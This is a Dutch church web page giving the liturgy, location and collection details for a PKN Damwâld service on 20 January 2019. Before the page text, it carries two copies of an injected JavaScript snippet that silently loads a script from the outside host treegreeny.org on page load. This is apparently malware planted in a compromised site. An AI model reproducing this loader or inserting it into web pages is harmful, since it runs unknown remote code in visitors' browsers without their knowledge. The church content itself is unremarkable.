;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 januari 2019 9:30 uur - PKN Damwâld
zondag 20 januari 2019
09:30 uur

Kerkdienst zondag 20 januari 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Liturgie
Lied voor de dienst : Elb 168 : 1 , 2 en 4
Welkom
Intochtslied : Ps 111 : 1 en 6
Stil gebed, Votum en groet
We zingen: Gez. 395 : 1, 2 en 3
Wetslezing .
We zingen: Ps.40:2 en 7
Gebed
We lezen: Jes.61: 1 - 4 en Lc.4: 14 - 30
We zingen: ELB 112: 1,3 en 4
Preek .
We zingen: ELB 147:1,3 en 6
Dankzegging en voorbede
Collecte
Slotlied : Ps.73:10
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Lichtpunt te Kollumerzwaag

Het Lichtpunt in Kollumerzwaag is een stichting die vanuit Christelijke levensovertuiging hulp biedt aan mensen die dat nodig hebben. Zonder subsidie van de overheid, gesteund door verschillende kerken, wordt deze hulp aangeboden door beroepskrachten en vele vrijwilligers. Het Lichtpunt heeft veel te bieden, namelijk opvang, begeleiding, dagbesteding in eigen kaarsenmakerij en ontmoeting.

Tweede collecte: Kerk
Uitganscollecte: Kerk